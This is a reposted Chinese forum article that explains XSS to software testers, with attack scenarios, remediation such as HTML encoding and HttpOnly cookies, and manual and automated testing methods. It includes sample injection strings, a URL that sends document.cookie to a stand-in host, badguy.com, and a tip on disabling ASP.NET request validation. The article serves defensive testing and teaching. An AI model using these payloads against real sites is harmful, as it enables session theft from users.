51Testing软件测试论坛

 找回密码
 (注-册)加入51Testing

QQ登录

只需一步,快速开始

微信登录,快人一步

手机号码,快捷登录

查看: 2294|回复: 0
打印 上一主题 下一主题

[转贴] Web安全测试之XSS

[复制链接]
  • TA的每日心情
    无聊
    昨天 09:05
  • 签到天数: 1050 天

    连续签到: 1 天

    [LV.10]测试总司令

    跳转到指定楼层
    1#
    发表于 2016-6-30 14:21:52 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
    文章出处:博客园 文章作者:肖佳
    XSS 全称(Cross Site Scripting) 跨站脚本攻击, 是Web程序中最常见的漏洞。指攻击者在网页中嵌入客户端脚本(例如JavaScript), 当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到攻击者的目的.  比如获取用户的Cookie,导航到恶意网站,携带木马等。
    作为测试人员,需要了解XSS的原理,攻击场景,如何修复。 才能有效的防止XSS的发生。

    XSS 是如何发生的呢假如有下面一个textbox
    <input type="text" name="address1" value="value1from">
    value1from是来自用户的输入,如果用户不是输入value1from,而是输入 "/><script>alert(document.cookie)</script><!- 那么就会变成
    <input type="text" name="address1" value=""/><script>alert(document.cookie)</script><!- ">
    嵌入的JavaScript代码将会被执行

    或者用户输入的是  "onfocus="alert(document.cookie)      那么就会变成
    <input type="text" name="address1" value="" onfocus="alert(document.cookie)">
    事件被触发的时候嵌入的JavaScript代码将会被执行
    攻击的威力,取决于用户输入了什么样的脚本

    当然用户提交的数据还可以通过QueryString(放在URL中)和Cookie发送给服务器. 例如下图


    HTML EncodeXSS之所以会发生, 是因为用户输入的数据变成了代码。 所以我们需要对用户输入的数据进行HTML Encode处理。 将其中的"中括号", “单引号”,“引号” 之类的特殊字符进行编码。

    在C#中已经提供了现成的方法,只要调用HttpUtility.HtmlEncode("string <scritp>") 就可以了。  (需要引用System.Web程序集)
    Fiddler中也提供了很方便的工具, 点击Toolbar上的"TextWizard" 按钮


    XSS 攻击场景1. Dom-Based XSS 漏洞 攻击过程如下
    Tom 发现了Victim.com中的一个页面有XSS漏洞,
    例如: http://victim.com/search.asp?term=apple
    服务器中Search.asp 页面的代码大概如下
    [url=][/url]
    <html>
      <title></title>
      <body>
        Results  for  <%Reequest.QueryString("term")%>
        ...
      </body>
    </html>[url=][/url]

    Tom 先建立一个网站http://badguy.com,  用来接收“偷”来的信息。
    然后Tom 构造一个恶意的url(如下), 通过某种方式(邮件,QQ)发给Monica
    http://victim.com/search.asp?term=<script>window.open("http://badguy.com?cookie="+document.cookie)</script>
    Monica点击了这个URL, 嵌入在URL中的恶意Javascript代码就会在Monica的浏览器中执行. 那么Monica在victim.com网站的cookie, 就会被发送到badguy网站中。这样Monica在victim.com 的信息就被Tom盗了.

    2. Stored XSS(存储式XSS漏洞), 该类型是应用广泛而且有可能影响大Web服务器自身安全的漏洞,攻击者将攻击脚本上传到Web服务器上,使得所有访问该页面的用户都面临信息泄露的可能。 攻击过程如下

    Alex发现了网站A上有一个XSS 漏洞,该漏洞允许将攻击代码保存在数据库中,
    Alex发布了一篇文章,文章中嵌入了恶意JavaScript代码。
    其他人如Monica访问这片文章的时候,嵌入在文章中的恶意Javascript代码就会在Monica的浏览器中执行,其会话cookie或者其他信息将被Alex盗走。

    Dom-Based XSS漏洞威胁用户个体,而存储式XSS漏洞所威胁的对象将是大量的用户.

    XSS 漏洞修复原则: 不相信客户输入的数据
    注意:  攻击代码不一定在<script></script>中
    • 将重要的cookie标记为http only,   这样的话Javascript 中的document.cookie语句就不能获取到cookie了.
    • 只允许用户输入我们期望的数据。 例如: 年龄的textbox中,只允许用户输入数字。 而数字之外的字符都过滤掉。
    • 对数据进行Html Encode 处理
    • 过滤或移除特殊的Html标签, 例如: <script>, <iframe> ,  &lt; for <, &gt; for >, &quot for
    • 过滤JavaScript 事件的标签。例如 "onclick=", "onfocus" 等等。
    如何测试XSS漏洞方法一:  查看代码,查找关键的变量,   客户端将数据传送给Web 服务端一般通过三种方式 Querystring, Form表单,以及cookie.  例如在ASP的程序中,通过Request对象获取客户端的变量
    <%
    strUserCode =  Request.QueryString(“code”);
    strUser =  Request.Form(“USER”);
    strID =    Request.Cookies(“ID”);
    %>
    假如变量没有经过htmlEncode处理, 那么这个变量就存在一个XSS漏洞

    方法二: 准备测试脚本,
    "/><script>alert(document.cookie)</script><!--
    <script>alert(document.cookie)</script><!--
    "onclick="alert(document.cookie)

    在网页中的Textbox或者其他能输入数据的地方,输入这些测试脚本, 看能不能弹出对话框,能弹出的话说明存在XSS漏洞
    在URL中查看有那些变量通过URL把值传给Web服务器, 把这些变量的值退换成我们的测试的脚本。  然后看我们的脚本是否能执行

    方法三:  自动化测试XSS漏洞
    现在已经有很多XSS扫描工具了。 实现XSS自动化测试非常简单,只需要用HttpWebRequest类。 把包含xss 测试脚本。发送给Web服务器。 然后查看HttpWebResponse中,我们的XSS测试脚本是否已经注入进去了。
    HTML Encode 和URL Encode的区别刚开始我老是把这两个东西搞混淆, 其实这是两个不同的东西。
    HTML编码前面已经介绍过了,关于URL 编码是为了符合url的规范。因为在标准的url规范中中文和很多的字符是不允许出现在url中的。
    例如在baidu中搜索"测试汉字"。 URL会变成
    http://www.baidu.com/s?wd=%B2%E2 ... t=3&inputT=7477

    所谓URL编码就是: 把所有非字母数字字符都将被替换成百分号(%)后跟两位十六进制数,空格则编码为加号(+

    在C#中已经提供了现成的方法,只要调用HttpUtility.UrlEncode("string <scritp>") 就可以了。  (需要引用System.Web程序集)
    Fiddler中也提供了很方便的工具, 点击Toolbar上的"TextWizard" 按钮
    浏览器中的XSS过滤器为了防止发生XSS, 很多浏览器厂商都在浏览器中加入安全机制来过滤XSS。 例如IE8,IE9,Firefox, Chrome. 都有针对XSS的安全机制。 浏览器会阻止XSS。 例如下图


    如果需要做测试, 最好使用IE7。
    ASP.NET中的XSS安全机制 ASP.NET中有防范XSS的机制,对提交的表单会自动检查是否存在XSS,当用户试图输入XSS代码的时候,ASP.NET会抛出一个错误如下图

    很多程序员对安全没有概念, 甚至不知道有XSS的存在。 ASP.NET在这一点上做到默认安全。 这样的话就算是没有安全意识的程序员也能写出一个”较安全的网站“。
    如果想禁止这个安全特性, 可以通过 <%@  Page  validateRequest=“false"  %>

    分享到:  QQ好友和群QQ好友和群 QQ空间QQ空间 腾讯微博腾讯微博 腾讯朋友腾讯朋友
    收藏收藏1
    回复

    使用道具 举报

    本版积分规则

    关闭

    站长推荐上一条 /1 下一条

    小黑屋|手机版|Archiver|51Testing软件测试网 ( 沪ICP备05003035号 关于我们

    GMT+8, 2024-11-22 06:35 , Processed in 0.063098 second(s), 23 queries .

    Powered by Discuz! X3.2

    © 2001-2024 Comsenz Inc.

    快速回复 返回顶部 返回列表